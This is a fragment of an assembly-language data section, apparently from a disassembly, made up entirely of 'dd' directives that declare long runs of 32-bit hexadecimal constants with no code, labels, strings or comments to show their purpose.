dd 310302Eh, 0B6AF1F2h, 751E8A0Ch, 0FA4C6B64h, 62C038AFh
dd 4529427Dh, 6F5A30Bh, 0E944B4B5h, 61E53C7Ah, 41DBB4B6h
dd 42BF7DEAh, 0E9A955EBh, 408FA8BEh, 77CA409Ch, 7D03DB97h
dd 78DC5413h, 9C010294h, 8E4FDE88h, 18317B8Ah, 9D667CD4h
dd 0DB31739Eh, 0B827038Eh, 0F935F16Eh, 702BF640h, 72872143h
dd 7DE81F8Ch, 8CF0E782h, 6F709937h, 82928CE1h, 460E89DFh
dd 0BF46CC93h, 599587B9h, 54F9A2EFh, 0C7E2C237h, 0D8B4E084h
dd 1933F30Ch, 0C2AEAC99h, 0D4C1887Eh, 5B0322E6h, 55D11CB5h
dd 3B39C7B3h, 0E07389B4h, 17A578ABh, 95BCAC7h, 0AD8BB391h
dd 735E50FDh, 10DDDC65h, 97708A2Fh, 0E367DE3Ah, 0E9EAE31h
dd 63DD0C79h, 0C947B0C7h, 0E3623AACh, 1A7C74E8h, 3ECC313h
dd 9A63DE84h, 537F4E83h, 8AF2369h, 146DC4DDh, 863E4C21h
dd 0DDE4B350h, 19D43503h, 1ABB2EC8h, 0E9AA2F02h, 0A3B40454h
dd 0B871DDB6h, 8B84B0ADh, 0C1C6867Ch, 8680C4A9h, 0ABA6D81Fh
dd 75086A61h, 0EA73C0A7h, 0D06A0E3h, 0A9B908D1h, 0D93FDDC0h
dd 0E3BB2379h, 0ACAB51C5h, 601EB54h, 58BCAC09h, 8902ABC8h
dd 12A038D7h, 0B70215AAh, 26631E19h, 0FFDFE0BCh, 1CFD146Ah
dd 17B1B6F8h, 0C766BF84h, 509A1069h, 0BEC79562h, 18BE5BCAh
dd 89557E5Dh, 1225DCC2h, 76C2B2E4h, 0E2BE181h, 0D7C499D5h
dd 48421EC1h, 0E5212F1Bh, 0AE28DDADh, 6D17F4F1h, 76F6D6A9h
dd 70338918h, 1113FF52h, 27E4E678h, 79EDD03Ch, 0A3A14E25h
dd 71E6E2BEh, 155018CFh, 0C1828048h, 0ECFBC065h, 64A891EFh
dd 0E13425E1h, 0F6D5CBC8h, 7D3D095Bh, 29768415h, 19E4E7A7h
dd 0BA73C1EFh, 0D4FDBD26h, 0B054EBA3h, 4B44D92Ch, 2A2E8B93h
dd 0BAA80B2Ah, 27F17ECh, 0A5616AFEh, 0F17BD1C0h, 0F72A8BE6h
dd 18DA00FAh, 0DC267901h, 7EB12A59h, 65A1CA91h, 39D388F4h
dd 5A9586ECh, 9E908807h, 0B8D36E9Ah, 0B9B280EEh, 4AC10365h
dd 44746B64h, 22FE9680h, 6B089B82h, 5EF323A0h, 0A2EB2BC5h
dd 0AE44EFFDh, 0D0508386h, 6B87176Ch, 806C375Ch, 95A62577h
dd 3B25B846h, 0DD8D12B3h, 26E04372h, 0CC498C69h, 744FCDE7h
dd 0AF019383h, 81DE7967h, 9F693085h, 0D8F57B26h, 5E38D834h
dd 0CD25F676h, 0A7172A6Fh, 0A3F37BCEh, 0A4224CE3h, 0E154FB22h
dd 7677C7B0h, 7DF9B534h, 0BC7232EDh, 395A7D6Ah, 0B477DE4Eh
dd 0C291A27Ah, 9821419Dh, 7792E518h, 52CF58FDh, 45A67E6Eh
dd 52E487ABh, 455D9328h, 2297F02Ah, 6F406B30h, 0CDBCD496h
dd 0DCC31192h, 0F6A7ADDh, 0E86B81CDh, 0BA45D503h, 0C6C6D780h
dd 245682B9h, 8CF85DCAh, 0EF0F694Bh, 177E430Ch, 41D89CBBh
dd 60211C4Ch, 12C9108Eh, 8C26BEC1h, 0FB197739h, 0C46F776h
dd 2AABA95Fh, 4C2FB1FDh, 0E76B9711h, 0DBA4E9CBh, 0DEBFFCF7h
dd 61AD1DB6h, 1345F591h, 5A0AB2F0h, 42E2EA1Ah, 85295658h
dd 90FD37ACh, 862E2041h, 5646271Eh, 3C3BACCEh, 5FB11D76h
dd 27BF336Bh, 0B5E10A8Fh, 8D419050h, 4853B43Ch, 0D4A7441Fh
dd 26AB9C8h, 41ED9DFDh, 20057DEBh, 0C45DADE1h, 9B5987DBh
dd 3078F0B7h, 94309122h, 61C09870h, 8D768988h, 3F431919h
dd 0A8E1DB54h, 86501447h, 0EF238220h, 9946CBBAh, 321BDB98h
dd 9FD43A43h, 8261B655h, 78905608h, 0ABC9E069h, 4217FA07h
dd 0E3E159B2h, 364C7642h, 9C062014h, 0E899498Ch, 0BA3D5A6Ah
dd 671C45EEh, 6B06AABDh, 0AC57A7C1h, 0A71311C4h, 598DE7B8h
dd 0E9F5CD79h, 0FBF13D32h, 6A453952h, 98C3F5ABh, 1EF896D4h
dd 0C90B9C0h, 84E0C440h, 64B9665h, 54A8BB71h, 73E74DC2h
dd 0AE51E1A9h, 0AADF0546h, 645A03D7h, 0BA429355h, 7775E2E3h
dd 0CD9152C6h, 530B1BC1h, 0B84F1CC2h, 43064B35h, 0DC428246h
dd 136A3FF0h, 3AEA4A94h, 9B47ACE7h, 3C5D9246h, 82B0BCF5h
dd 0E134897Bh, 0D4D146BAh, 6F49679Bh, 1731607Bh, 33C1A5F6h
dd 0D0953274h, 5F09685Fh, 0EA63A3BDh, 90ED03B0h, 0B516E205h
dd 75016C81h, 0B800359Fh, 1C1D317Fh, 3DC4FD30h, 0A9A4F5ECh
dd 2972069Ah, 0CC1650ACh, 0E2762647h, 86C891E6h, 0DC5B5963h
dd 26756BB5h, 0A553FD19h, 0DDC81342h, 0A0A81C14h, 0B2BFD174h
dd 0DC0FB6FBh, 22CEF20Ah, 1DDFBEC1h, 0FE83E49h, 91BCB418h
dd 0E0B569DFh, 66A1129Dh, 0EBF62F8Eh, 0C2B4304Ah, 7D2C357Eh
dd 0B8FCD5C0h, 0AB9DBE31h, 0EDB7D42h, 5A124C03h, 0C06850E9h
dd 0EFBEBAD7h, 738A4BFh, 57054234h, 66374691h, 0EE5CF475h
dd 69659923h, 0CA3AE48Dh, 0A801A7F3h, 795ACFB1h, 2D40199h
dd 0B536833Ah, 8ED83DA6h, 2EA59AACh, 909754DCh, 0BC169750h
dd 9E608C12h, 0DE844A40h, 775AF9A0h, 0D8A9C01Ah, 0BD27BE2Ch
dd 0AEAD383Ch, 0B58A7Bh, 8D352909h, 0B080DA6Fh, 73284AE7h
dd 6DDA143Ah, 0C33B728Dh, 9CCD61EDh, 0F1294879h, 8E54CF8Fh
dd 0C8DE0116h, 0F2B17A0Fh, 0A603D442h, 0C6B281Eh, 79BBA12Dh
dd 0EAD21B77h, 60A69330h, 0F2CCA544h, 0FBE929AAh, 0B1D86798h
dd 94B56AE9h, 0A13041Bh, 220091E1h, 4892A796h, 8858781h
dd 0B732392Ah, 85CC1FA3h, 0DC475966h, 888537F0h, 9BEA1020h
dd 232A583Fh, 7F596F4Dh, 7E5B79F9h, 4EDEF83Fh, 0BC79A84Fh
dd 0E09C1BC8h, 7D1F3E95h, 8BC241CBh, 44D1B6BCh, 0B295643h
dd 0DCFAFE96h, 0EF4B1D45h, 4B24398Ah, 9D8C0C46h, 2407D11Ah
dd 16C92F0Fh, 8E6F085Ah, 0A6EB0FBDh, 3BCC3C14h, 4848E066h
dd 0CBD9F491h, 0BDB7FE5Eh, 14819BC3h, 0C07CEB9h, 7BCFBFF7h
dd 7A527030h, 1C28EDB3h, 4C53ABCEh, 0A19DF69Ch, 0D36B621Eh
dd 0B5E70396h, 0AF6CE226h, 597DBF6h, 0EC053CD1h, 0AA7A4419h
dd 9CCC1848h, 3D85D123h, 5C7CA95Bh, 585C4507h, 49EBF69Ah
dd 14F2F7E4h, 6E5E208Dh, 0E3C9B6F4h, 71345E0Ch, 472CEF54h
dd 52FBBC73h, 0C98D5D73h, 63069C29h, 397C6CFCh, 2DA091DDh
dd 0A023F89Dh, 0C91FC92Dh, 0FC6F2400h, 99131364h, 958E9A6Eh
dd 0AF5CBE16h, 32515CBFh, 55E74897h, 4657ECEDh, 0DB431F2Ch
dd 0C7D2B51Bh, 4690DA86h, 0D29137E4h, 6BD30D21h, 7A501117h
dd 85051A58h, 0FC6A3434h, 0AA7E9DD8h, 0FF71578Ah, 0F664E371h
dd 0CFA95EF5h, 0A3A1367h, 0D9B582F2h, 3830C093h, 411F2791h
dd 5B2C09D7h, 9B9D3A4Eh, 0A34AF6F1h, 482BB9AFh, 30900114h
dd 0AF6BB1A6h, 43C24B6Fh, 5DD9DD90h, 7F4D234Dh, 2C5075Ch
dd 53BA1D31h, 899DF742h, 7107E118h, 60E46B3Ch, 8FA3F6BAh
dd 96037A4Bh, 36616C2Dh, 0BE080FC4h, 0BB4DB164h, 97AE9391h
dd 8D8E1F35h, 8D2BB300h, 2750642Dh, 0ACC44AD2h, 0BB9E37Eh
dd 0A1B997CBh, 9A4DE7F6h, 308D7156h, 2ED80FD6h, 2683A18Ch
dd 6F048042h, 0E7BE486Eh, 5C1A21Ah, 25760889h, 6E245AEFh
dd 0BD77EA7Dh, 27CCA088h
dd 0F5AD9D27h, 0F711E11Bh, 258C37Bh, 0F03CF4CEh, 320B5A3h
dd 0BB642E1Bh, 0A9F198ECh, 27F986E2h, 4CE40C76h, 0B1F39415h
dd 0EB854AD5h, 33C97989h, 58665AEEh, 0A744AB9Bh, 5F1B53F9h
dd 5B5F7BEDh, 6C18CA50h, 0EF529784h, 3343A472h, 0C256C941h
dd 24761749h, 158C8F97h, 0ACF6D3CEh, 62CDBA64h, 0A1678186h
dd 1C8A38F4h, 0DAE9F10Fh, 3DA3B88Eh, 20AF4982h, 54CBA586h
dd 0ECB4A1F2h, 0FB8DF758h, 0B0790BFFh, 256AC51Bh, 7CD05501h
dd 0F1D9DECDh, 0B0AB4EF5h, 7340308h, 20630E13h, 99EFE813h
dd 92EB54FEh, 0B55C59Fh, 0C31CD630h, 31DE8F63h, 6D6B703Fh
dd 146E8AA8h, 2AD16817h, 8511B5E9h, 0A300B00Ch, 8B7FA7B8h
dd 2E4CFF0Ah, 5BB956Ah, 5F48045Ah, 5EB82A3h, 29D49102h
dd 86B88879h, 0B2E451h, 4E3A99BCh, 1C45F74Eh, 0D8105A33h
dd 0FAEDE09Ah, 0DDE29406h, 93FEB44Dh, 10B71CA4h, 0ACAA254Dh
dd 3B4C3F2Ch, 0DC980C75h, 25100542h, 1F8D9637h, 0DD6F90CCh
dd 6C355E7Dh, 27B91F5Fh, 9C0E2EBEh, 0B00C7C6Dh, 0A1A29F99h
dd 0C2CD43Bh, 0C32668A7h, 42EBDBDAh, 0DB118F74h, 0C839EE2Ah
dd 153FBC3Fh, 0F0C2D183h, 0E9B8811Bh, 0BFC523BDh, 87DCF4CCh
dd 0BD92C2Fh, 0BA03FDB9h, 5DA60714h, 0EBC5B9E9h, 0CECBAFE9h
dd 0EB0C206h, 48BC7FBBh, 4DE745AAh, 9098F444h, 3EECE5DDh
dd 19C57A30h, 90348857h, 5EA154D6h, 0EED09F43h, 0CDEE7755h
dd 0C8625CDBh, 7B5D2582h, 89339D1Bh, 405D5412h, 607984DEh
dd 502071BAh, 0EC670045h, 24E61893h, 0F6CCA4E6h, 16ABDF11h
dd 2A522AFEh, 0BF7D9C55h, 52EE5E58h, 0BC4FD93Fh, 0AEDA04C6h
dd 8670D063h, 5BE537Fh, 66C1B69h, 8D0933B9h, 26D6DA72h
dd 76C12104h, 57DB5C1Bh, 23D725Ah, 2A3F79A9h, 5133180Bh
dd 0B843B756h, 0B152573Ch, 7DA6943Eh, 2C4EF653h, 0E99351ADh
dd 105DBDA9h, 1F22ECC0h, 0AC9E541Ah, 0DD7BF57Ah, 0BC33D533h
dd 0B609DA2Dh, 3589125Dh, 2719C5A3h, 3DB90E32h, 0C1127D03h
dd 20456264h, 0F38988AAh, 4539B713h, 879D3A06h, 0F083DF0Ch
dd 60262762h, 0B129B2A5h, 0B956A56Ch, 628FBD9h, 98BB05BBh
dd 4BD52B91h, 9B447495h, 7100229Ah, 1E7C95D3h, 0BA7B0F4Ah
dd 5C8FB113h, 19E9818Eh, 1D05C7BDh, 0D1C54718h, 8A19A525h
dd 87F64EA5h, 6F8E3BD3h, 0ECF3D13Ch, 0EF0DB562h, 7BC767BCh
dd 0C6EEA498h, 39AFA18Dh, 324BF410h, 3783E4DCh, 753397CCh
dd 6CBFE716h, 0BCDA64B1h, 6599C164h, 0C387DD19h, 7CA237D7h
dd 46A6B37Eh, 9D7ABEAEh, 9FDBE158h, 0BAFA9E4Dh, 74D955D9h
dd 12A99958h, 0DD1DD39Dh, 8A667941h, 4E640F9Ah, 1CFBD6AEh
dd 84A72753h, 0AF2A17AEh, 0F1B5CB7Dh, 0C6001C7Dh, 70D43337h
dd 7BA5935Eh, 3A5B1CACh, 0E8DB6D48h, 2EBFEAC2h, 0C87C086Dh
dd 0D3263E2Ah, 0D94824C2h, 42427BA0h, 17F9F891h, 725F7F2Bh
dd 0C60C2375h, 239F3CCDh, 2D229AAEh, 9CD4BAC9h, 0D866DB28h
dd 19E420EFh, 879A606Bh, 16F29DD3h, 0A2B2971h, 0DDCCFA1Eh
dd 46F0A2A6h, 0AEC8CC08h, 679632C3h, 4DAF7BF3h, 67218909h
dd 0A4D7D574h, 2A648057h, 2CCBAE01h, 0C12221F3h, 0B9DE72F5h
dd 282FF413h, 0B5B49E49h, 0C1FD3170h, 0EF82DCFFh, 442258BAh
dd 88F265BFh, 7D6CB53Ah, 469AB7DBh, 0D679DB79h, 0A6CAB78Ch
dd 3A42D9A3h, 2BA8D331h, 2D61DB3Bh, 0F3FE3B57h, 0FA38BC4Dh
dd 0F2DA0218h, 42BB8B0Eh, 0B6189B64h, 71501618h, 3B92AEE1h
dd 1A1EDE21h, 0CE6ECE77h, 0EC60138Dh, 664314D8h, 5E4A26D6h
dd 0DE1BBD39h, 0C121F0ACh, 4E0A902Ah, 4D43B7B8h, 0C5E7F1E8h
dd 20597534h, 97045CF0h, 8F18091Ah, 0DE6F456Dh, 575C8913h
dd 141A65A0h, 70CAAB6Ch, 4A16C012h, 6E80841Ch, 25225EB1h
dd 9D89AFCh, 11376A07h, 0DBD70EF6h, 614C2DECh, 12BAF31Dh
dd 0DC2F9AA8h, 97A7C7F3h, 0B4481F4Ch, 0CD17507Eh, 61153367h
dd 19EB784Ch, 84B05C4Dh, 25B10622h, 8E20077Ch, 0AD646681h
dd 0CE93F587h, 241A7481h, 29F1C87Eh, 2AA63F70h, 0F206D946h
dd 655EFE70h, 0D4BB95B6h, 8E20A2A1h, 0B038A69h, 9C9454DAh
dd 0C46619BCh, 0BBCD029Bh, 0FD7CB81Eh, 0E065A74Eh, 7C36754Eh
dd 0C5ACDF88h, 744B2ECh, 38568AA3h, 310D3D54h, 0CC530D8h
dd 5AA88163h, 427EEDACh, 8997A6A7h, 235F8EB6h, 0FC008154h
dd 11659B2Ah, 564ED783h, 0A74CD70Ch, 5AD1411Bh, 2BF4D29Dh
dd 0D19E391Fh, 10D4B1F4h, 33967C08h, 6F0397EFh, 0BE7CC607h
dd 7C2319B2h, 672C8FFDh, 0C9E5638Bh, 0A7CA4D91h, 0B98F212Ch
dd 62B613E5h, 5291B41Ch, 19327B24h, 0BD3F23EAh, 1EBF048Fh
dd 0FDB2FB09h, 89D030C3h, 57552F44h, 9F7119A8h, 3D326BEAh
dd 9597CFC0h, 633E337Bh, 684EA31Ah, 0F215B0F0h, 961F6809h
dd 99995514h, 53144919h, 0A2218B9Fh, 9D305DEh, 971BEF73h
dd 0BE061E45h, 0C561635Eh, 7C2F9FF5h, 6AB75EE9h, 4C22010Eh
dd 2DB2D5ACh, 3AC0F74Ah, 444C47D1h, 31262ABFh, 0D153A5BAh
dd 0E0D858E4h, 679A6D04h, 23134D03h, 459CA1BEh, 0E37597DEh
dd 1F618D8Fh, 978133C2h, 0F759472Dh, 0E67F3A31h, 0F906C06Bh
dd 642AF071h, 331B08D3h, 0F96B33C8h, 0BA40ECB8h, 0CF213EACh
dd 985E8CE5h, 88AACD5Ah, 0F17A3192h, 0BB1E4CAAh, 0E1DE754h
dd 32C76DEEh, 8B72DB45h, 526A5263h, 0E85BD723h, 0F5A8B2BBh
dd 1E4597Bh, 17989F2Eh, 436B9207h, 16DA20A4h, 38B9C6BAh
dd 0CEE02A39h, 1ED6FBCBh, 0CF92E306h, 0E25C2952h, 3F9FAC11h
dd 3ABC2EECh, 9B3D5590h, 0DDA9DA66h, 32C6C55Fh, 5A87021Dh
dd 7A01BDFBh, 0D2978AAEh, 87BC2870h, 0E671FC82h, 160F3A09h
dd 0E026C09h, 0EEE6382Dh, 31C99CFh, 0D785C7E0h, 2D9AEEE1h
dd 0A799D115h, 98A5FA53h, 9C482080h, 0B04EE59Ch, 5C21E010h
dd 92DDBCDh, 0CF72BCBh, 29E8BED9h, 319BD49Fh, 9D820DBCh
dd 0E410903Fh, 79F4C50Ah, 483172C5h, 0B209A458h, 97B65EEh
dd 52014C0Bh, 0F167C28Eh, 795A64E3h, 0FD12BD0Ah, 2835D3CAh
dd 45E933EBh, 60C1B76Eh, 0AF31DBB1h, 742C122Bh, 342C717Dh
dd 0E7FAA6C4h, 0D77E14F3h, 1E13D8D7h, 0A6A669EDh, 95CE6371h
dd 656C4360h, 8E6FFA4Ch, 1CD3B6F9h, 7E593FD6h, 31BA45FBh
dd 5D9D883Dh, 4540A48Bh, 0EE15A82Bh, 0FD5F764Eh, 92DC7CAAh
dd 0C1CC5F70h, 54FAFE54h, 54332AF6h, 0CB0DBCB6h, 6F72A451h
dd 0F8A408A4h, 222B78A1h, 4A4BDF1Ah, 1F4263A4h, 0BE99B266h
dd 0F64B6494h, 0F52723C9h, 88B89559h, 8ACD6319h, 692A0C1Eh
dd 0CBFE56A9h, 0FE543B7Fh, 2DACC75Dh, 3E988CFDh, 7C70F3ECh
dd 70F70618h, 17BE344Fh, 0D27E3CA1h, 941EA488h, 3F02DB8Ch
dd 0BB49F0Fh, 5A248B5Ah, 0D2144A28h, 60FAF019h, 5827D9A5h
dd 73179DC0h, 37CF5BD4h, 0E745D852h, 77CFAD01h, 0E8C22809h
dd 0F0981A6h, 30A530B9h, 0C16F6185h, 8196421Ah, 0E416AF63h
dd 0D51A8CBAh, 0AB877D0Dh, 82027322h, 4DDC5597h, 1B63B680h
dd 79427BDBh, 3C306C87h, 9F2DB26Dh, 0AAE0E956h, 35E2B244h
dd 0C1BAE08Dh, 0C4C23FBAh, 5015705Ah, 0A14A6B3Fh, 0D92976CEh
dd 0E2094408h, 9C7B1DA7h, 0DF62D7C2h, 635D63F5h, 0CAABF438h
dd 0CFEA1B33h, 0E9EF4AA7h, 0D28F7280h, 41EE0E4Fh, 7D2B8A0Ch
dd 0E58A6157h, 0E0FA9073h, 8672DE5Fh, 5603017h, 0B14492DFh
dd 6F73317Ch, 4D6248E2h, 0A9B834CDh, 448F4ED8h, 0E251DADCh
dd 3DC20BB9h, 26D0A305h
dd 3E45267Bh, 0D5105702h, 52C31239h, 0EECAC84Eh, 0E59811h
dd 6BFF06DBh, 59FDEDFEh, 483BE761h, 0FBE21F43h, 605356EEh
dd 0A5E2E1B6h, 2C1A004Fh, 5007FD89h, 0CDFFB466h, 0E0DD25FAh
dd 9176623Fh, 338F61BDh, 975704F2h, 1B93E259h, 29EB4F62h
dd 2E52C8B1h, 0C3F8CA89h, 0BAC6354Ah, 0F593A2F4h, 9C6B6261h
dd 0A55A5909h, 67B9F949h, 14356733h, 1E1B3C0Bh, 240EF8C3h
dd 0EFE981Eh, 16C09ED1h, 78818534h, 8BEE72A0h, 0BA4AD317h
dd 2A0B2323h, 88EB50CEh, 52E60D3Ah, 0FFEC0001h, 0CAED2B7Bh
dd 0DB0DBDFBh, 0B7FF1791h, 0E60BEC06h, 0B7B1396Eh, 1DD73022h
dd 0E25DBA93h, 9405528Eh, 0C61A8AD8h, 0C1D51756h, 940DD6AAh
dd 0D47C4E1Ah, 0A4ED7F30h, 1CABC190h, 3B19AB71h, 74DCF4BAh
dd 409E940Bh, 8D244E18h, 8AD112F8h, 41946EB7h, 53A35D15h
dd 9648FB42h, 22354CECh, 0D3CB2082h, 0E029769Ch, 79618EA7h
dd 0FEB08728h, 26987B5Bh, 3779D06Eh, 481539C3h, 81EC328h
dd 5F7F7F40h, 0B2763C9Ah, 0F01EFFD8h, 0FE994540h, 2FB422A8h
dd 0E8C05DEFh, 5D84BA43h, 9FFF047h, 42A3ADA2h, 236DB024h
dd 0D8EDCDCBh, 0B5CB37DEh, 0D07FD007h, 3315A48Eh, 7945B59Ch
dd 4D234E4Eh, 2B418D90h, 0D4CA948Dh, 507C50B3h, 0EEE32788h
dd 0B2DD113Bh, 0B6117AD3h, 836D836Dh, 0D8F6FB5Bh, 0FFC3936Fh
dd 0C1F77B52h, 27DAA924h, 435C5896h, 0DD65100Bh, 89904D19h
dd 0E2568923h, 86A6C210h, 6F2ABD7Dh, 0F0FFC9D2h, 7E750794h
dd 6C422FC7h, 5705347Fh, 23C7A471h, 0AAF30B18h, 4C393709h
dd 0E5B7EA99h, 0F4F2A8F8h, 34B7469Dh, 0BDCC5613h, 997BB2F7h
dd 0BEE571F7h, 0ECCA448Bh, 0DE82A7BDh, 0CCCFE0E1h, 0E5478A45h
dd 162D43F3h, 0D94605B9h, 0A53AA8ACh, 10F89B1Ah, 0CEC67770h
dd 5F002ACAh, 4F0B5C8Eh, 0AA2C1FE8h, 0FA0F0885h, 8EEFE31Ah
dd 72C5FDE5h, 0FE44C741h, 60D6C713h, 0FD2152B3h, 834E7D47h
dd 2C03FF3Dh, 886669EEh, 0FEA12230h, 0B0BD80B1h, 6965C7BFh
dd 983FEA61h, 344F44E2h, 8C5F96A2h, 6FD13352h, 0DCCCEA0Ah
dd 4E15ECC7h, 1FA09A5Ah, 9D9A97CCh, 0B2A872F4h, 13D18E97h
dd 0BDDFB5Ch, 771C0C87h, 351A8C90h, 0ABBB953h, 0BDE7BA3h
dd 694FB2D3h, 0EA99C545h, 0A4FAEB96h, 0F153EC50h, 77355F2Ah
dd 13B9E92Ah, 0A2615E14h, 0D7520A79h, 2BE85543h, 92CCFD76h
dd 60EFD6D2h, 5F97B39Eh, 73D8772h, 22C1827Fh, 0DED6872Ah
dd 86A3C9EAh, 1D33E82Fh, 0AAA12582h, 5F1FE5F7h, 0D7FAF58Dh
dd 2C01E433h, 0A7A168EEh, 0F1B6FC59h, 1F86BE6Ch, 0EF0EB07h
dd 3DD16EAEh, 5FE19651h, 5BB4F60h, 86D6999Bh, 60AE1587h
dd 0E91DA5FEh, 25000EECh, 0D54CC97Ah, 48F3C145h, 5B791357h
dd 91FA7B1Eh, 0D3AF2CCBh, 0AE0660E5h, 0BC6BD4ECh, 366D48DBh
dd 0A68C9EE3h, 0B04D9500h, 4F044179h, 0A12872BBh, 0CD98E109h
dd 9A9B0F70h, 0A5D0DC9Fh, 4E2BB837h, 5AC2C43Ah, 0CD0A9BBBh
dd 1EEAE4E5h, 7BB95ABAh, 0D7F7003Ch, 0D5606DC1h, 0AB7D338Ah
dd 71BD9213h, 652F1CC1h, 0E26BD461h, 3219ADD4h, 108B0B29h
dd 1EF2C7B1h, 0B8B7467h, 0DAF8FB29h, 0E286E7Bh, 3DB4A907h
dd 469D8AD7h, 84E00D82h, 2B29D75Eh, 882446A2h, 905C616Eh
dd 0BAF0EFBFh, 0A5B9DDD5h, 25B78247h, 1FE9F622h, 0DB97A245h
dd 63B6917Bh, 0EEA31B7Ah, 0F044FAC9h, 5C770D5h, 0CB981EF5h
dd 78212F23h, 36F3FDB2h, 14BD1A4Fh, 0B1873936h, 93E650C1h
dd 3E73663Eh, 99A83263h, 0EF2A2A91h, 3DF09771h, 0D76EF39Dh
dd 0E32253E5h, 0FC4CD2F8h, 51DC4CA5h, 7D3AB3A0h, 0B084D9A8h
dd 0EE362B56h, 867B8D0Fh, 0DE53350Bh, 5345D12Eh, 0AC1EFFBDh
dd 4C692BACh, 0C1ADE72Fh, 8C0BB98Dh, 7585BAB9h, 52B5356Fh
dd 8B2A72BCh, 59FCA91h, 257600Bh, 4D8EC6DFh, 29EA0043h
dd 0A9BB209Bh, 2415DE48h, 9C9EE9DEh, 6DA01999h, 6228E5B3h
dd 0F721BF7Eh, 0D18399D0h, 0E028CF07h, 6B955609h, 8DFC3FC4h
dd 5F76373Bh, 9184ACB3h, 0C1ACB2A6h, 14F94438h, 40048EB2h
dd 940EC2D9h, 36DD4D10h, 2F9B6A67h, 0ED11A44Dh, 8EB61A6Ch
dd 26A7EB75h, 0AEE29A2Ch, 0BE520CB2h, 9E0BF43Eh, 0C5780D1Eh
dd 4C9BE917h, 30492750h, 265BD0C8h, 9775AD91h, 96B535BAh
dd 76393282h, 0CF5378AAh, 0D151EF81h, 6129ED21h, 7405B0BDh
dd 48637B7Fh, 38DE6956h, 0FB999F2Dh, 1B2B99F2h, 6D60C08Dh
dd 0F5A290B1h, 0AAA5690Ah, 47B6E9C1h, 0A96B99F5h, 53BA8EFDh
dd 0C35506A0h, 370CCC46h, 486423ECh, 0E93396A0h, 526DDB8Fh
dd 0E485A4EBh, 95484313h, 8838D91Eh, 94F55CC7h, 0AEBA2690h
dd 0CF090FACh, 7717E95Dh, 0B8B56356h, 3ED4D240h, 51945989h
dd 0C4CA788Eh, 0E7A242E9h, 3F0B40E7h, 792453E5h, 0FCFF2233h
dd 0C5B667C5h, 0BCAE1DE3h, 0B0E2FFA4h, 0BBAEBF13h, 0AC2630D0h
dd 6B8199EAh, 84EF4009h, 4E29B65Bh, 0D908EFAEh, 0C81EDA70h
dd 3459909Dh, 1346F91Ch, 59A420B5h, 598BC9F5h, 0BBC23081h
dd 0D21DEE28h, 9E6897D7h, 8D4A7ACh, 0CD4F6829h, 0D4F924C6h
dd 2EF4E349h, 33C1A7AAh, 217F3223h, 8D9478D0h, 2802882Ah
dd 302550ABh, 931C2CEFh, 0EBB8B6EDh, 0ED7168A5h, 35110B93h
dd 3977A812h, 5BC188DBh, 83DFEEABh, 0A350F5C7h, 7D8C6842h
dd 0AEB8FCFh, 8A5CB969h, 7505AE34h, 7290CC71h, 97F60DD5h
dd 0A6B9BD23h, 0F4AC6FC5h, 8F415302h, 9191200Bh, 0EA95C2EBh
dd 0DC01667Eh, 0A0702E81h, 0E708D64Dh, 0AE4CA4DCh, 3437D15Fh
dd 0C9CDF0B3h, 30F3E88h, 1EADCF82h, 36BED9FDh, 0EC947671h
dd 9CBE7E7Eh, 3B7DE907h, 0DA12CEF8h, 9965091Eh, 241C2980h
dd 98D76395h, 0EFC51918h, 8478AA19h, 0F1AB03F1h, 9443A723h
dd 7DC538A6h, 6F29AFF0h, 0D77E6335h, 0EF3F6FB8h, 0A4056567h
dd 0F16CD8B6h, 0B780705Eh, 6355FBEBh, 5C8B5964h, 0B6EFAF00h
dd 0EF7C5CA9h, 0D1B177CEh, 0C0370B44h, 8621A61Bh, 0A99387C2h
dd 0A9BD739Ah, 0A6F6578Dh, 0DA87BA6Eh, 1B871A4Ah, 8F38B655h
dd 8A51DC88h, 3070D83h, 2B926137h, 0BBC9B63Ah, 0D84B2988h
dd 76AD2C05h, 0A7E9CC9h, 0FDB4723Eh, 5AF6FE36h, 0EC393245h
dd 163E5B31h, 0ED1931C3h, 0EDB5EDDh, 179F034Ah, 480B7219h
dd 0E7C6095Ah, 0C27EA54h, 8C650675h, 8218FF82h, 200376F6h
dd 0E82CF8FCh, 0C9DD8D94h, 0C52BB9DFh, 856655E0h, 28BF1C27h
dd 9DC8B428h, 8DE88EFDh, 4C0F492Ah, 61919FC6h, 0D73F95E4h
dd 898BE365h, 0D9987F63h, 6A70C640h, 0F14354B5h, 0A0295DCEh
dd 2CBCF040h, 329C74Dh, 0CBCFBE6Fh, 0EDEA3A3Dh, 0D83506F0h
dd 0A2D6D52Eh, 0C573689Eh, 0CEA14095h, 36B4EFBh, 8E51CA3Ah
dd 0FDC88933h, 0B24EA1CEh, 0C6095A6Dh, 4F1551D8h, 0F5A7305Eh
dd 0ECBEAF0Ch, 0B640364Dh, 0C8DD3113h, 882BE651h, 0F31C7E85h
dd 0D4A9E9Eh, 2E198C3Ah, 9C810C02h, 9E06CEC2h, 668AAB62h
dd 0C3932425h, 0F2D028E3h, 0E4DA91BEh, 6BAAB79Eh, 775EEBABh
dd 4CA17AA7h, 0E892BAA7h, 7F72BFBh, 6FF79AAFh, 0BAE5C9BCh
dd 8574D18Dh, 4FAE2EFFh, 4E00C88Ch, 0EB8B6E77h, 377B1F25h
dd 0F8C0A9A3h, 611E73DBh, 5C4AA22Ch, 5EC631Eh, 0D6DC9BF9h
dd 3FBD38E5h, 85DC6066h, 5454D29Ah, 2B613406h, 0AE3F5454h
dd 19645E07h, 0B447497Eh, 0C1ADEF75h, 0B1D4662Eh, 2E1AC21Bh
dd 0E718D4B6h, 0B053B330h, 0F9D490CFh, 2CF46C10h, 95AD9776h
dd 0B350A66h, 87CF20Ch
dd 0DB7E50E1h, 1614D3EFh, 6652951Fh, 9684CD37h, 3C2338AAh
dd 898A5AC7h, 53D7A60Bh, 0E3C4F7C7h, 0CDB48E1Fh, 59232F38h
dd 121A6235h, 0F3820A75h, 0F6E72F0Eh, 0A78B9A70h, 3CB819E4h
dd 0EEC5FA43h, 9669A515h, 0AC1AB151h, 582D8480h, 440497B1h
dd 0EA399228h, 0C69F8025h, 90260099h, 0DCDE98ABh, 81003A8Dh
dd 4F76639Ch, 4792BDDCh, 9732EC64h, 0F3AB7F28h, 8969F135h
dd 30854DDCh, 6C79FA9h, 0F712807Ch, 0B38C88DBh, 0CFBE464Eh
dd 990208BFh, 45E19A1h, 0A448DF23h, 5042B88Ch, 0F6E15376h
dd 0E1C1083Ah, 5CC28E4Ch, 0EC9F69D4h, 6491F830h, 6F85125Dh
dd 0F7720985h, 705475AAh, 5ACDC25Fh, 3420264Eh, 0F768B2FBh
